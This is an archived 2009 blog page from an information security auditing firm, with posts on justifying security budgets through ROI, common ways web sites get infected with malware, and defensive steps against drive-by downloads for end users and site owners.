ERE Information Security Auditors
Home | Site Map | Contact Us | Blog
This text is replaced by the Flash movie.
 Executive Strategies for Managing Risk
Audit Tactics for Managing Risk

Archive for October, 2009

Calculating ROI to Justify Information Security and Compliance Budgets

Tuesday, October 27th, 2009

Executive Summary
The way to get the executive team to pay attention is to provide a quality ROI on any new initiative. If the Boards of Directors can’t understand the needs of various departments then the only way to their pocketbook is to present them with a bottom line return on their investment.

In the case of procuring a security budget executives are often less than forthcoming because of the lack of information they receive from department heads. Boards of Directors and executive teams respond most favorably to requests for information security budgets which are cost justified with a simple ROI business case.

The business case needs to specifically show how potential costs associated with liability, caused by security breaches, may be minimized by implementing a sound security infrastructure. This can be accomplished by allowing a third party to do a security audit that provides evidence of security risks.

This approach of utilizing an ROI to cost justify a security budget is the same premise used to purchase insurance for commodities like office furniture, computers, etc. The difference is that if a security breach occurs as a result of not implementing the proper protection procedures, the associated costs far outweigh the costs to replace furniture.

The potential liabilities, such as loss of production and/or loss of reputation are translated into actual dollars in the ROI. The security budgets are created by taking a small percentage of the cost of the potential losses and applying it to preventative measures.

As such this calculation of ROI is actually a calculation of the % of the cost to avoid the cost of liability compared to the potential cost of liability. This is similar to the methodology for calculating the financial benefit of insurance for commodities such as office buildings, furniture and computers. [1]

Since the cost of a security infrastructure often falls within about the same price ratio of commodity insurance, one would think this cost justification would be easily sold to an executive committee.

This is often the case, particularly when the business risks identified in the business case are based upon hard evidence of actual security risks. Actual security risks can be identified by evidentiary security audits. These audits are performed by impartial third parties, with an expertise in identifying both technical and policy risks.

[1] Typical annual insurance rates for commodities are about 1.5% – 2.5% of asset replacement cost. The author has observed (over many business cases) that annual security budgets can similarly be about 2% – 4% of potential security breach related costs.

My next blog will focus on the Methodology of Calculating ROI.

Have a secure week.

Regards, Ron Lepofsky, B.A. SC. (Mech Eng), CISSP

ERE Information Security Auditors. www.ere-security.ca

Tags: , , , ,
Posted in Information Security, Internet Security, Security Postings | No Comments »

Malware Vectors and Remediation for Web Sites

Monday, October 19th, 2009

Last week’s blog I discussed mitigation steps recommended end users for protecting themselves from malware in general and specifically from drive by malware.

This week I will identify some of most common (popular) malware technical vectors for infecting web sites, and how web site owners can protect their sites.

Technical Malware Vectors

  • SQL Injection Attack – exploit application layer security vulnerabilities in order to inject active code or change code in applications or direct attack of databases.
  • Javascript Injection Attack – one form of an SQL attack.
  • IFrame Injection Attack – strings or active code injected into the web page, sometimes due to poor input data validation.
  • Javascript injection- invokes IFrames, active code.
  • Stolen FTP credentials Attack – stolen FTP credentials for the web site to gain unauthorized access.
  • Server Application Code Vulnerabilities – poorly written or not thoroughly tested code.
  • Redirect Injection Attack – takes advantage of function of a web page to a web server of attacker’s choice.
  • Malvertising – grabs user information even if publisher is doing a good job.  Malvertizing injects dangerous code especially where there is the opportunity for user generated.

Mitigation Steps for Web Site Owners

  • Incorporate security into application development / database access at the design stage.  Do not treat application security as a bolt-on or afterthought. Particular emphasis on data input fields.
  • Thoroughly test all data input fields and validation for input fields.  Audit all user input fields and user contribution fields by internal audit or by a group other than the developers.
  • Update and patch the Java Virtual Machine (JVM) and Java Developer Kits (JDK).
  • Ensure the integrity of any third party tools for managing a web site, even seemingly innocuous apps like traffic counters.
  • Constantly look for unauthorized changes in web site code, such as strings that cause URL redirects.  Employ tools to identify unauthorized changes in code.
  • Update and patch web server software.
  • Harden the web server platform.  Eliminate all unnecessary accounts, privileges, restrict access, and vigilantly monitor the logs for attempted but failed access, attempted unauthorized access, and of course successful unauthorized accesses.
    • Consider deploying a second layer of anti-malware monitoring and diagnostic technology that is

specifically designed for web site security, with the abilities to block attack attempts, log the

attempted and successful attacks, and which will generate reports and alerts.

  • Identify and remedy all network vulnerabilities for the infrastructure which houses the web site, its

platform, and of course its Internet access.

  • Have an impartial set of eyes review all aspects of network security, including architecture (isolation of web site on a DMZ, etc.), policies and score of compliance with policies, security architecture and how effectively it is used, event log monitoring, and with the risk of repetition; timely and consistent upgrades and patching.

Have a secure week.

Regards

Ron Lepofsky, B.A. SC. (Mech Eng), CISSP

ERE Information Security Auditor

www.ere-security.ca

Tags: , , , ,
Posted in Information Security, Internet Security, Security Postings | 3 Comments »

Preventative Measures for Drive-By Malware

Monday, October 12th, 2009

My last blog discussed the financial motivation for creating malware.  This article identifies preventative measures that both end users and web site managers can implement to protect all concerned from the dangers of drive-by malware.

As a brief reminder, drive-by malware is:

A download which the user indirectly authorized by clicking on a link or by being redirected to a misleading link, but without understanding the consequences.  For instance the user could be installing an unknown ActiveX component or Java applet.   Or any of this happens without the user even knowing about it.

The damaging occurs when the download contains spyware, a computer virus or any kind of malware. Download of malware through exploitation of a web browser, e-mail client or operating system bug, without any user intervention whatsoever. Websites that exploit the Windows Metafile vulnerability may provide examples of “drive-by downloads” of this sort.

Common occurrences of drive-by downloads happen when a user:

  • Visits a website.
  • Views an e-mail message.
  • Clicks on a deceptive popup window believing that, for instance, it is a bone fide message while in fact they have just initiated a malicious software download.

Mitigation Steps Recommended for the End User

  • In order of simple to more complex:
  • Do not store unencrypted personal information on a workstation.
  • Use strong passwords for encryption, access to the workstation, and to any services or devices to which access would be granted by using a workstation.
  • Do not use the same password for multiple devices / services.
  • Change the passwords regularly.
  • Do not open email from unknown senders.
  • Never click on attachments or links embedded within emails, even when the emails are from friends.  A friend may provide an attachment or link that, unknown to them, is infected with malware.
  • Do not go to unknown web sites that could be potentially dangerous.  If in doubt about the veracity of a web site, check its credentials on any number of black listed web sites; search black listed web sites.
  • Do not assume that the web site of a small organization is less prone to malware.  The trend is for criminals to install malware even on small and medium size sites.
  • Verify the certificates of web sites on which the user will be divulging confidential information and / or performing a financial transaction.  Where possible, I recommend, do the transaction by telephone, unless the end user is highly confident in the identity and reputation of the web site.
  • Install an anti-malware package on each workstation.
  • Use a browser with anti-malware features.
  • Judiciously apply security patches to:
    • Anti-malware software.
    • Anti-malware features on a browser.
    • Operating system software.
    • All other application software.
    • At the very least, install a personal firewall in front of any Internet facing workstation.

My Next Blog Article

Next week I will identify some of the technical vectors used to install malware on web sites and the preventative and restorative steps web site owners can implement.

Have a secure week.

Regards,

Ron Lepofsky,

ERE Information Security Auditors.

Tags: , , , ,
Posted in Information Security, Internet Security, Security Postings | No Comments »

7dvehnay9m

Monday, October 5th, 2009

Posted in Security Postings | No Comments »
Home | Point in Time Audit | Doc Audit/Authorship | 7x24 Monitoring | Knowledge Transfer | ERE Differentiators | About Us | Site map | Contact Us | Blog
Copyrights © 2007-2008. All rights reserved.  Non-security resources 1|2|3|4|5|6|7|8|9

   AddThis Social Bookmark Button